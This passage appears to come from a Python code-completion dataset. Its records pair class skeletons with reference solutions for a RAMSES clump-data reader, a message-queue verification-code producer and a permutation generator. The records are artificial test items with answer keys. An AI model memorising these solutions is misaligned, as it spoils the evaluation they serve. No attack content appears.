par: parameters object clumpid: ID of clump for which we're working children: list of children\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.clumpids = np.zeros(1)\n self.parent = np.zeros(1)\n self.level = np.zeros(1)\n return\n<|end_body_0|>\n\n<|body_start_1|>\n if par.verbose:\n print('Reading clump data.')\n out = p.z0\n raw_data = [None for i in range(par.ncpu)]\n dirnrstr = str(par.outputnrs[out]).zfill(5)\n dirname = 'output_' + dirnrstr\n i = 0\n for cpu in range(par.ncpu):\n fname = os.path.join(dirname, 'clump_' + dirnrstr + '.txt' + str(cpu + 1).zfill(5))\n new_data = np.loadtxt(fname, dtype='int', skiprows=1, usecols=[0, 1, 2])\n if new_data.ndim == 2:\n raw_data[i] = new_data\n i += 1\n elif new_data.shape[0] == 3:\n raw_data[i] = np.atleast_2d(new_data)\n i += 1\n fulldata = np.concatenate(raw_data[:i], axis=0)\n self.clumpids = fulldata[:, 0]\n self.level = fulldata[:, 1]\n self.parent = fulldata[:, 2]\n return\n<|end_body_1|>\n\n<|body_start_2|>\n for i, c in enumerate(self.clumpids):\n if c not in mtd.descendants[par.z0]:\n self.clumpids[i] = 0\n self.level[i] = 0\n self.parent[i] = -1\n return\n<|end_body_2|>\n\n<|body_start_3|>\n children = []\n last_added = [clumpid]\n loopcounter = 0\n while True:\n loopcounter += 1\n this_level_parents = copy.copy(last_added)\n children += this_level_parents\n last_added = []\n for i, cid in enumerate(self.clumpids):\n if self.parent[i] in this_level_parents and cid != clumpid:\n last_added.append(cid)\n if len(last_added) == 0:\n break\n if loopcounter == 100:\n print(\"Finished 100 iterations, we shouldn't be this deep\")\n break\n return children[1:]\n<|end_body_3|>\n\n<|body_start_4|>\n hfile = ''.join([par.halofilename, '-', str(clumpid), '.txt'])\n f = open(hfile, 'w')\n f.write('# {0:>18} {1:>18} {2:>18}\\n'.format('halo', 'nr_of_children', 'children'))\n nc = len(children)\n dumpstring = ' {0:18d} {1:18d}'.format(clumpid, nc)\n dumpstring = ''.join([dumpstring] + [' {0:18d}'.format(c) for c in children] + ['\\n'])\n f.write(dumpstring)\n f.close()\n return\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000461", "length_bytes": 36252, "license_type": "no_license", "methods": [{"docstring": "par: params object", "name": "__init__", "signature": "def __init__(self, par)"}, {"docstring": "Reads in the clump data. Only for the z = 0 directory. par: params object", "name": "read_clumpdata", "signature": "def read_clumpdata(self, par)"}, {"docstring": "The particle unbinding can remove entire clumps from the catalogue. If the option isn't set in the namelist, the clumpfinder output will still be made not based on the clumpfinder. If that is the case, the clumpfinder catalogue will contain clumps which the mergertree data doesn't have, leading to problems. So remove those here. mtd: mergertree data object", "name": "cleanup_clumpdata", "signature": "def cleanup_clumpdata(self, par, mtd)"}, {"docstring": "Find the children for given clump ID. clumpid: clump ID for which to work for returns: children: list of children IDs of clumpid", "name": "find_children", "signature": "def find_children(self, clumpid)"}, {"docstring": "Write the children to file. 
par: parameters object clumpid: ID of clump for which we're working children: list of children", "name": "write_children", "signature": "def write_children(self, par, clumpid, children)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_005179", "prompt": "Implement the Python class `clumpdata` described below.\n\nClass description:\nData from clump_XXXXX.txtYYYYY\n\nMethod signatures and docstrings:\n- def __init__(self, par): par: params object\n- def read_clumpdata(self, par): Reads in the clump data. Only for the z = 0 directory. par: params object\n- def cleanup_clumpdata(self, par, mtd): The particle unbinding can remove entire clumps from the catalogue. If the option isn't set in the namelist, the clumpfinder output will still be made not based on the clumpfinder. If that is the case, the clumpfinder catalogue will contain clumps which the mergertree data doesn't have, leading to problems. So remove those here. mtd: mergertree data object\n- def find_children(self, clumpid): Find the children for given clump ID. clumpid: clump ID for which to work for returns: children: list of children IDs of clumpid\n- def write_children(self, par, clumpid, children): Write the children to file. par: parameters object clumpid: ID of clump for which we're working children: list of children", "prompted_full_text": "Implement the Python class `clumpdata` described below.\n\nClass description:\nData from clump_XXXXX.txtYYYYY\n\nMethod signatures and docstrings:\n- def __init__(self, par): par: params object\n- def read_clumpdata(self, par): Reads in the clump data. Only for the z = 0 directory. par: params object\n- def cleanup_clumpdata(self, par, mtd): The particle unbinding can remove entire clumps from the catalogue. If the option isn't set in the namelist, the clumpfinder output will still be made not based on the clumpfinder. If that is the case, the clumpfinder catalogue will contain clumps which the mergertree data doesn't have, leading to problems. So remove those here. mtd: mergertree data object\n- def find_children(self, clumpid): Find the children for given clump ID. clumpid: clump ID for which to work for returns: children: list of children IDs of clumpid\n- def write_children(self, par, clumpid, children): Write the children to file. par: parameters object clumpid: ID of clump for which we're working children: list of children\n\n<|skeleton|>\nclass clumpdata:\n \"\"\"Data from clump_XXXXX.txtYYYYY\"\"\"\n\n def __init__(self, par):\n \"\"\"par: params object\"\"\"\n <|body_0|>\n\n def read_clumpdata(self, par):\n \"\"\"Reads in the clump data. Only for the z = 0 directory. par: params object\"\"\"\n <|body_1|>\n\n def cleanup_clumpdata(self, par, mtd):\n \"\"\"The particle unbinding can remove entire clumps from the catalogue. If the option isn't set in the namelist, the clumpfinder output will still be made not based on the clumpfinder. If that is the case, the clumpfinder catalogue will contain clumps which the mergertree data doesn't have, leading to problems. So remove those here. mtd: mergertree data object\"\"\"\n <|body_2|>\n\n def find_children(self, clumpid):\n \"\"\"Find the children for given clump ID. clumpid: clump ID for which to work for returns: children: list of children IDs of clumpid\"\"\"\n <|body_3|>\n\n def write_children(self, par, clumpid, children):\n \"\"\"Write the children to file. 
par: parameters object clumpid: ID of clump for which we're working children: list of children\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.clumpids = np.zeros(1)\n self.parent = np.zeros(1)\n self.level = np.zeros(1)\n return\n<|end_body_0|>\n\n<|body_start_1|>\n if par.verbose:\n print('Reading clump data.')\n out = p.z0\n raw_data = [None for i in range(par.ncpu)]\n dirnrstr = str(par.outputnrs[out]).zfill(5)\n dirname = 'output_' + dirnrstr\n i = 0\n for cpu in range(par.ncpu):\n fname = os.path.join(dirname, 'clump_' + dirnrstr + '.txt' + str(cpu + 1).zfill(5))\n new_data = np.loadtxt(fname, dtype='int', skiprows=1, usecols=[0, 1, 2])\n if new_data.ndim == 2:\n raw_data[i] = new_data\n i += 1\n elif new_data.shape[0] == 3:\n raw_data[i] = np.atleast_2d(new_data)\n i += 1\n fulldata = np.concatenate(raw_data[:i], axis=0)\n self.clumpids = fulldata[:, 0]\n self.level = fulldata[:, 1]\n self.parent = fulldata[:, 2]\n return\n<|end_body_1|>\n\n<|body_start_2|>\n for i, c in enumerate(self.clumpids):\n if c not in mtd.descendants[par.z0]:\n self.clumpids[i] = 0\n self.level[i] = 0\n self.parent[i] = -1\n return\n<|end_body_2|>\n\n<|body_start_3|>\n children = []\n last_added = [clumpid]\n loopcounter = 0\n while True:\n loopcounter += 1\n this_level_parents = copy.copy(last_added)\n children += this_level_parents\n last_added = []\n for i, cid in enumerate(self.clumpids):\n if self.parent[i] in this_level_parents and cid != clumpid:\n last_added.append(cid)\n if len(last_added) == 0:\n break\n if loopcounter == 100:\n print(\"Finished 100 iterations, we shouldn't be this deep\")\n break\n return children[1:]\n<|end_body_3|>\n\n<|body_start_4|>\n hfile = ''.join([par.halofilename, '-', str(clumpid), '.txt'])\n f = open(hfile, 'w')\n f.write('# {0:>18} {1:>18} {2:>18}\\n'.format('halo', 'nr_of_children', 'children'))\n nc = len(children)\n dumpstring = ' {0:18d} {1:18d}'.format(clumpid, nc)\n dumpstring = ''.join([dumpstring] + [' {0:18d}'.format(c) for c in children] + ['\\n'])\n f.write(dumpstring)\n f.close()\n return\n<|end_body_4|>\n", "revision_id": "f1bd65ef106dbf5e4cefefd7d386643a6fc0ac52", "skeleton": "<|skeleton|>\nclass clumpdata:\n \"\"\"Data from clump_XXXXX.txtYYYYY\"\"\"\n\n def __init__(self, par):\n \"\"\"par: params object\"\"\"\n <|body_0|>\n\n def read_clumpdata(self, par):\n \"\"\"Reads in the clump data. Only for the z = 0 directory. par: params object\"\"\"\n <|body_1|>\n\n def cleanup_clumpdata(self, par, mtd):\n \"\"\"The particle unbinding can remove entire clumps from the catalogue. If the option isn't set in the namelist, the clumpfinder output will still be made not based on the clumpfinder. If that is the case, the clumpfinder catalogue will contain clumps which the mergertree data doesn't have, leading to problems. So remove those here. mtd: mergertree data object\"\"\"\n <|body_2|>\n\n def find_children(self, clumpid):\n \"\"\"Find the children for given clump ID. clumpid: clump ID for which to work for returns: children: list of children IDs of clumpid\"\"\"\n <|body_3|>\n\n def write_children(self, par, clumpid, children):\n \"\"\"Write the children to file. 
par: parameters object clumpid: ID of clump for which we're working children: list of children\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class clumpdata:\n \"\"\"Data from clump_XXXXX.txtYYYYY\"\"\"\n\n def __init__(self, par):\n \"\"\"par: params object\"\"\"\n self.clumpids = np.zeros(1)\n self.parent = np.zeros(1)\n self.level = np.zeros(1)\n return\n\n def read_clumpdata(self, par):\n \"\"\"Reads in the clump data. Only for the z = 0 directory. par: params object\"\"\"\n if par.verbose:\n print('Reading clump data.')\n out = p.z0\n raw_data = [None for i in range(par.ncpu)]\n dirnrstr = str(par.outputnrs[out]).zfill(5)\n dirname = 'output_' + dirnrstr\n i = 0\n for cpu in range(par.ncpu):\n fname = os.path.join(dirname, 'clump_' + dirnrstr + '.txt' + str(cpu + 1).zfill(5))\n new_data = np.loadtxt(fname, dtype='int', skiprows=1, usecols=[0, 1, 2])\n if new_data.ndim == 2:\n raw_data[i] = new_data\n i += 1\n elif new_data.shape[0] == 3:\n raw_data[i] = np.atleast_2d(new_data)\n i += 1\n fulldata = np.concatenate(raw_data[:i], axis=0)\n self.clumpids = fulldata[:, 0]\n self.level = fulldata[:, 1]\n self.parent = fulldata[:, 2]\n return\n\n def cleanup_clumpdata(self, par, mtd):\n \"\"\"The particle unbinding can remove entire clumps from the catalogue. If the option isn't set in the namelist, the clumpfinder output will still be made not based on the clumpfinder. If that is the case, the clumpfinder catalogue will contain clumps which the mergertree data doesn't have, leading to problems. So remove those here. mtd: mergertree data object\"\"\"\n for i, c in enumerate(self.clumpids):\n if c not in mtd.descendants[par.z0]:\n self.clumpids[i] = 0\n self.level[i] = 0\n self.parent[i] = -1\n return\n\n def find_children(self, clumpid):\n \"\"\"Find the children for given clump ID. clumpid: clump ID for which to work for returns: children: list of children IDs of clumpid\"\"\"\n children = []\n last_added = [clumpid]\n loopcounter = 0\n while True:\n loopcounter += 1\n this_level_parents = copy.copy(last_added)\n children += this_level_parents\n last_added = []\n for i, cid in enumerate(self.clumpids):\n if self.parent[i] in this_level_parents and cid != clumpid:\n last_added.append(cid)\n if len(last_added) == 0:\n break\n if loopcounter == 100:\n print(\"Finished 100 iterations, we shouldn't be this deep\")\n break\n return children[1:]\n\n def write_children(self, par, clumpid, children):\n \"\"\"Write the children to file. 
par: parameters object clumpid: ID of clump for which we're working children: list of children\"\"\"\n hfile = ''.join([par.halofilename, '-', str(clumpid), '.txt'])\n f = open(hfile, 'w')\n f.write('# {0:>18} {1:>18} {2:>18}\\n'.format('halo', 'nr_of_children', 'children'))\n nc = len(children)\n dumpstring = ' {0:18d} {1:18d}'.format(clumpid, nc)\n dumpstring = ''.join([dumpstring] + [' {0:18d}'.format(c) for c in children] + ['\\n'])\n f.write(dumpstring)\n f.close()\n return\n", "source": "the_stack_v2_python_sparse", "source_path": "utils/py/mergertree-extract.py", "source_repo": "ALaDyn/ramses", "split": "test", "star_events_count": 6} {"blob_id": "6d3fdf0494fbb798c0d597d75943e07f32e156e1", "bodies": ["self.target = target\nself.code = code\nself.routing_key = template", "email_com = re.compile('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)')\nemailmatch = email_com.match(self.target)\nif emailmatch:\n return True\nmobile_com = re.compile('^(?:\\\\+?86)?1(?:3\\\\d{3}|5[^4\\\\D]\\\\d{2}|8\\\\d{3}|7(?:[01356789]\\\\d{2}|4(?:0\\\\d|1[0-2]|9\\\\d))|9[189]\\\\d{2}|6[567]\\\\d{2}|4[579]\\\\d{2})\\\\d{6}$')\nmobilematch = mobile_com.match(self.target)\nif mobilematch:\n return True\nreturn False", "body = {'target': self.target, 'code': self.code, 'routing_key': self.routing_key}\nbody_json = json.dumps(body).encode('utf8')\nconnection, channel = get_mq_channel()\nchannel.exchange_declare(exchange=MQEXCHANGE, exchange_type=MQEXCHANGETYPE)\nchannel.basic_publish(exchange=MQEXCHANGE, routing_key=self.routing_key, body=body_json)\nprint(' [x] Sent %r:%r' % (self.routing_key, self.code))\nconnection.close()"], "bodies_text": "<|body_start_0|>\n self.target = target\n self.code = code\n self.routing_key = template\n<|end_body_0|>\n\n<|body_start_1|>\n email_com = re.compile('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)')\n emailmatch = email_com.match(self.target)\n if emailmatch:\n return True\n mobile_com = re.compile('^(?:\\\\+?86)?1(?:3\\\\d{3}|5[^4\\\\D]\\\\d{2}|8\\\\d{3}|7(?:[01356789]\\\\d{2}|4(?:0\\\\d|1[0-2]|9\\\\d))|9[189]\\\\d{2}|6[567]\\\\d{2}|4[579]\\\\d{2})\\\\d{6}$')\n mobilematch = mobile_com.match(self.target)\n if mobilematch:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n body = {'target': self.target, 'code': self.code, 'routing_key': self.routing_key}\n body_json = json.dumps(body).encode('utf8')\n connection, channel = get_mq_channel()\n channel.exchange_declare(exchange=MQEXCHANGE, exchange_type=MQEXCHANGETYPE)\n channel.basic_publish(exchange=MQEXCHANGE, routing_key=self.routing_key, body=body_json)\n print(' [x] Sent %r:%r' % (self.routing_key, self.code))\n connection.close()\n<|end_body_2|>\n", "class_docstring": "消息队列的生产者:主要是通过短信和邮件获得验证码", "class_name": "Product", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Product:\n \"\"\"消息队列的生产者:主要是通过短信和邮件获得验证码\"\"\"\n\n def __init__(self, target, code, template, ip=None, **kwargs):\n \"\"\":param target: mobile email 平台的发送目标 e.g: mobile:139xx99 email:16xx3@qq.com :param code: 自定义发送内容 e.g: mobile:8888 :param template: 指定平台的发送信息的模板样式,同时也是队列的路由关键字 e.g: mobile:sms_register email:email_info :param ip: :param kwargs:\"\"\"\n <|body_0|>\n\n def verification_target(self):\n \"\"\"鉴别target是否有效 :return:\"\"\"\n <|body_1|>\n\n def send(self):\n \"\"\"生产者产生消息\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.target = target\n self.code = code\n self.routing_key = template\n<|end_body_0|>\n\n<|body_start_1|>\n email_com = 
re.compile('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)')\n emailmatch = email_com.match(self.target)\n if emailmatch:\n return True\n mobile_com = re.compile('^(?:\\\\+?86)?1(?:3\\\\d{3}|5[^4\\\\D]\\\\d{2}|8\\\\d{3}|7(?:[01356789]\\\\d{2}|4(?:0\\\\d|1[0-2]|9\\\\d))|9[189]\\\\d{2}|6[567]\\\\d{2}|4[579]\\\\d{2})\\\\d{6}$')\n mobilematch = mobile_com.match(self.target)\n if mobilematch:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n body = {'target': self.target, 'code': self.code, 'routing_key': self.routing_key}\n body_json = json.dumps(body).encode('utf8')\n connection, channel = get_mq_channel()\n channel.exchange_declare(exchange=MQEXCHANGE, exchange_type=MQEXCHANGETYPE)\n channel.basic_publish(exchange=MQEXCHANGE, routing_key=self.routing_key, body=body_json)\n print(' [x] Sent %r:%r' % (self.routing_key, self.code))\n connection.close()\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000462", "length_bytes": 2913, "license_type": "no_license", "methods": [{"docstring": ":param target: mobile email 平台的发送目标 e.g: mobile:139xx99 email:16xx3@qq.com :param code: 自定义发送内容 e.g: mobile:8888 :param template: 指定平台的发送信息的模板样式,同时也是队列的路由关键字 e.g: mobile:sms_register email:email_info :param ip: :param kwargs:", "name": "__init__", "signature": "def __init__(self, target, code, template, ip=None, **kwargs)"}, {"docstring": "鉴别target是否有效 :return:", "name": "verification_target", "signature": "def verification_target(self)"}, {"docstring": "生产者产生消息", "name": "send", "signature": "def send(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005295", "prompt": "Implement the Python class `Product` described below.\n\nClass description:\n消息队列的生产者:主要是通过短信和邮件获得验证码\n\nMethod signatures and docstrings:\n- def __init__(self, target, code, template, ip=None, **kwargs): :param target: mobile email 平台的发送目标 e.g: mobile:139xx99 email:16xx3@qq.com :param code: 自定义发送内容 e.g: mobile:8888 :param template: 指定平台的发送信息的模板样式,同时也是队列的路由关键字 e.g: mobile:sms_register email:email_info :param ip: :param kwargs:\n- def verification_target(self): 鉴别target是否有效 :return:\n- def send(self): 生产者产生消息", "prompted_full_text": "Implement the Python class `Product` described below.\n\nClass description:\n消息队列的生产者:主要是通过短信和邮件获得验证码\n\nMethod signatures and docstrings:\n- def __init__(self, target, code, template, ip=None, **kwargs): :param target: mobile email 平台的发送目标 e.g: mobile:139xx99 email:16xx3@qq.com :param code: 自定义发送内容 e.g: mobile:8888 :param template: 指定平台的发送信息的模板样式,同时也是队列的路由关键字 e.g: mobile:sms_register email:email_info :param ip: :param kwargs:\n- def verification_target(self): 鉴别target是否有效 :return:\n- def send(self): 生产者产生消息\n\n<|skeleton|>\nclass Product:\n \"\"\"消息队列的生产者:主要是通过短信和邮件获得验证码\"\"\"\n\n def __init__(self, target, code, template, ip=None, **kwargs):\n \"\"\":param target: mobile email 平台的发送目标 e.g: mobile:139xx99 email:16xx3@qq.com :param code: 自定义发送内容 e.g: mobile:8888 :param template: 指定平台的发送信息的模板样式,同时也是队列的路由关键字 e.g: mobile:sms_register email:email_info :param ip: :param kwargs:\"\"\"\n <|body_0|>\n\n def verification_target(self):\n \"\"\"鉴别target是否有效 :return:\"\"\"\n <|body_1|>\n\n def send(self):\n \"\"\"生产者产生消息\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.target = target\n self.code = code\n self.routing_key = template\n<|end_body_0|>\n\n<|body_start_1|>\n email_com = re.compile('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)')\n emailmatch = email_com.match(self.target)\n if emailmatch:\n return True\n mobile_com = 
re.compile('^(?:\\\\+?86)?1(?:3\\\\d{3}|5[^4\\\\D]\\\\d{2}|8\\\\d{3}|7(?:[01356789]\\\\d{2}|4(?:0\\\\d|1[0-2]|9\\\\d))|9[189]\\\\d{2}|6[567]\\\\d{2}|4[579]\\\\d{2})\\\\d{6}$')\n mobilematch = mobile_com.match(self.target)\n if mobilematch:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n body = {'target': self.target, 'code': self.code, 'routing_key': self.routing_key}\n body_json = json.dumps(body).encode('utf8')\n connection, channel = get_mq_channel()\n channel.exchange_declare(exchange=MQEXCHANGE, exchange_type=MQEXCHANGETYPE)\n channel.basic_publish(exchange=MQEXCHANGE, routing_key=self.routing_key, body=body_json)\n print(' [x] Sent %r:%r' % (self.routing_key, self.code))\n connection.close()\n<|end_body_2|>\n", "revision_id": "b7aecaf01497806617489cc25b3491a6422f69fb", "skeleton": "<|skeleton|>\nclass Product:\n \"\"\"消息队列的生产者:主要是通过短信和邮件获得验证码\"\"\"\n\n def __init__(self, target, code, template, ip=None, **kwargs):\n \"\"\":param target: mobile email 平台的发送目标 e.g: mobile:139xx99 email:16xx3@qq.com :param code: 自定义发送内容 e.g: mobile:8888 :param template: 指定平台的发送信息的模板样式,同时也是队列的路由关键字 e.g: mobile:sms_register email:email_info :param ip: :param kwargs:\"\"\"\n <|body_0|>\n\n def verification_target(self):\n \"\"\"鉴别target是否有效 :return:\"\"\"\n <|body_1|>\n\n def send(self):\n \"\"\"生产者产生消息\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Product:\n \"\"\"消息队列的生产者:主要是通过短信和邮件获得验证码\"\"\"\n\n def __init__(self, target, code, template, ip=None, **kwargs):\n \"\"\":param target: mobile email 平台的发送目标 e.g: mobile:139xx99 email:16xx3@qq.com :param code: 自定义发送内容 e.g: mobile:8888 :param template: 指定平台的发送信息的模板样式,同时也是队列的路由关键字 e.g: mobile:sms_register email:email_info :param ip: :param kwargs:\"\"\"\n self.target = target\n self.code = code\n self.routing_key = template\n\n def verification_target(self):\n \"\"\"鉴别target是否有效 :return:\"\"\"\n email_com = re.compile('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)')\n emailmatch = email_com.match(self.target)\n if emailmatch:\n return True\n mobile_com = re.compile('^(?:\\\\+?86)?1(?:3\\\\d{3}|5[^4\\\\D]\\\\d{2}|8\\\\d{3}|7(?:[01356789]\\\\d{2}|4(?:0\\\\d|1[0-2]|9\\\\d))|9[189]\\\\d{2}|6[567]\\\\d{2}|4[579]\\\\d{2})\\\\d{6}$')\n mobilematch = mobile_com.match(self.target)\n if mobilematch:\n return True\n return False\n\n def send(self):\n \"\"\"生产者产生消息\"\"\"\n body = {'target': self.target, 'code': self.code, 'routing_key': self.routing_key}\n body_json = json.dumps(body).encode('utf8')\n connection, channel = get_mq_channel()\n channel.exchange_declare(exchange=MQEXCHANGE, exchange_type=MQEXCHANGETYPE)\n channel.basic_publish(exchange=MQEXCHANGE, routing_key=self.routing_key, body=body_json)\n print(' [x] Sent %r:%r' % (self.routing_key, self.code))\n connection.close()\n", "source": "the_stack_v2_python_sparse", "source_path": "Dockerfiles/mq/expand/direct_product.py", "source_repo": "leipengkai/docker-drf", "split": "test", "star_events_count": 1} {"blob_id": "ef67cb7ddd6a739eaf553b30cf2bfe82fc573c92", "bodies": ["total_n = factorial(len(nums))\nresult = []\nfor i in range(total_n):\n result.append(nums[:])\n nums = self.next_permute(nums)\nreturn result", "first_idx = len(nums) - 2\nsecond_idx = len(nums) - 1\nwhile first_idx >= 0 and nums[first_idx] >= nums[first_idx + 1]:\n first_idx -= 1\nif first_idx == -1:\n return nums[:][::-1]\nelse:\n ans = nums[:]\n while ans[second_idx] <= ans[first_idx]:\n second_idx -= 
1\n ans[first_idx], ans[second_idx] = (ans[second_idx], ans[first_idx])\n ans[first_idx + 1:] = ans[first_idx + 1:][::-1]\n return ans"], "bodies_text": "<|body_start_0|>\n total_n = factorial(len(nums))\n result = []\n for i in range(total_n):\n result.append(nums[:])\n nums = self.next_permute(nums)\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n first_idx = len(nums) - 2\n second_idx = len(nums) - 1\n while first_idx >= 0 and nums[first_idx] >= nums[first_idx + 1]:\n first_idx -= 1\n if first_idx == -1:\n return nums[:][::-1]\n else:\n ans = nums[:]\n while ans[second_idx] <= ans[first_idx]:\n second_idx -= 1\n ans[first_idx], ans[second_idx] = (ans[second_idx], ans[first_idx])\n ans[first_idx + 1:] = ans[first_idx + 1:][::-1]\n return ans\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution_B2", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution_B2:\n\n def permute(self, nums: List[int]) -> List[List[int]]:\n \"\"\"Version B2 Non-proxy, recursive method, but direct handle elements in nums This only works for when sample is a collection of distinct numbers\"\"\"\n <|body_0|>\n\n def next_permute(self, nums: List[int]) -> List[int]:\n \"\"\"Herlper for B1, B2 From Leetcode LC031: next permutation, modified to return a new permute list instead in-place calculate the next permuatation, with integers 0 to N-1 (as idx proxy) this will both modify idx_list and return the updated idx_list\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n total_n = factorial(len(nums))\n result = []\n for i in range(total_n):\n result.append(nums[:])\n nums = self.next_permute(nums)\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n first_idx = len(nums) - 2\n second_idx = len(nums) - 1\n while first_idx >= 0 and nums[first_idx] >= nums[first_idx + 1]:\n first_idx -= 1\n if first_idx == -1:\n return nums[:][::-1]\n else:\n ans = nums[:]\n while ans[second_idx] <= ans[first_idx]:\n second_idx -= 1\n ans[first_idx], ans[second_idx] = (ans[second_idx], ans[first_idx])\n ans[first_idx + 1:] = ans[first_idx + 1:][::-1]\n return ans\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000463", "length_bytes": 5911, "license_type": "permissive", "methods": [{"docstring": "Version B2 Non-proxy, recursive method, but direct handle elements in nums This only works for when sample is a collection of distinct numbers", "name": "permute", "signature": "def permute(self, nums: List[int]) -> List[List[int]]"}, {"docstring": "Herlper for B1, B2 From Leetcode LC031: next permutation, modified to return a new permute list instead in-place calculate the next permuatation, with integers 0 to N-1 (as idx proxy) this will both modify idx_list and return the updated idx_list", "name": "next_permute", "signature": "def next_permute(self, nums: List[int]) -> List[int]"}], "n_methods": 2, "prompt": "Implement the Python class `Solution_B2` described below.\n\nClass description:\nImplement the Solution_B2 class.\n\nMethod signatures and docstrings:\n- def permute(self, nums: List[int]) -> List[List[int]]: Version B2 Non-proxy, recursive method, but direct handle elements in nums This only works for when sample is a collection of distinct numbers\n- def next_permute(self, nums: List[int]) -> List[int]: Herlper for B1, B2 From Leetcode LC031: next permutation, modified to return a new permute list instead in-place calculate the next permuatation, with integers 0 to N-1 (as idx proxy) this will both modify idx_list and 
return the updated idx_list", "prompted_full_text": "Implement the Python class `Solution_B2` described below.\n\nClass description:\nImplement the Solution_B2 class.\n\nMethod signatures and docstrings:\n- def permute(self, nums: List[int]) -> List[List[int]]: Version B2 Non-proxy, recursive method, but direct handle elements in nums This only works for when sample is a collection of distinct numbers\n- def next_permute(self, nums: List[int]) -> List[int]: Herlper for B1, B2 From Leetcode LC031: next permutation, modified to return a new permute list instead in-place calculate the next permuatation, with integers 0 to N-1 (as idx proxy) this will both modify idx_list and return the updated idx_list\n\n<|skeleton|>\nclass Solution_B2:\n\n def permute(self, nums: List[int]) -> List[List[int]]:\n \"\"\"Version B2 Non-proxy, recursive method, but direct handle elements in nums This only works for when sample is a collection of distinct numbers\"\"\"\n <|body_0|>\n\n def next_permute(self, nums: List[int]) -> List[int]:\n \"\"\"Herlper for B1, B2 From Leetcode LC031: next permutation, modified to return a new permute list instead in-place calculate the next permuatation, with integers 0 to N-1 (as idx proxy) this will both modify idx_list and return the updated idx_list\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n total_n = factorial(len(nums))\n result = []\n for i in range(total_n):\n result.append(nums[:])\n nums = self.next_permute(nums)\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n first_idx = len(nums) - 2\n second_idx = len(nums) - 1\n while first_idx >= 0 and nums[first_idx] >= nums[first_idx + 1]:\n first_idx -= 1\n if first_idx == -1:\n return nums[:][::-1]\n else:\n ans = nums[:]\n while ans[second_idx] <= ans[first_idx]:\n second_idx -= 1\n ans[first_idx], ans[second_idx] = (ans[second_idx], ans[first_idx])\n ans[first_idx + 1:] = ans[first_idx + 1:][::-1]\n return ans\n<|end_body_1|>\n", "revision_id": "143422321cbc3715ca08f6c3af8f960a55887ced", "skeleton": "<|skeleton|>\nclass Solution_B2:\n\n def permute(self, nums: List[int]) -> List[List[int]]:\n \"\"\"Version B2 Non-proxy, recursive method, but direct handle elements in nums This only works for when sample is a collection of distinct numbers\"\"\"\n <|body_0|>\n\n def next_permute(self, nums: List[int]) -> List[int]:\n \"\"\"Herlper for B1, B2 From Leetcode LC031: next permutation, modified to return a new permute list instead in-place calculate the next permuatation, with integers 0 to N-1 (as idx proxy) this will both modify idx_list and return the updated idx_list\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution_B2:\n def permute(self, nums: List[int]) -> List[List[int]]:\n \"\"\"Version B2 Non-proxy, recursive method, but direct handle elements in nums This only works for when sample is a collection of distinct numbers\"\"\"\n total_n = factorial(len(nums))\n result = []\n for i in range(total_n):\n result.append(nums[:])\n nums = self.next_permute(nums)\n return result\n\n def next_permute(self, nums: List[int]) -> List[int]:\n \"\"\"Herlper for B1, B2 From Leetcode LC031: next permutation, modified to return a new permute list instead in-place calculate the next permuatation, with integers 0 to N-1 (as idx proxy) this will both modify idx_list and return the updated idx_list\"\"\"\n first_idx = len(nums) - 2\n second_idx = len(nums) - 1\n while first_idx >= 0 and 
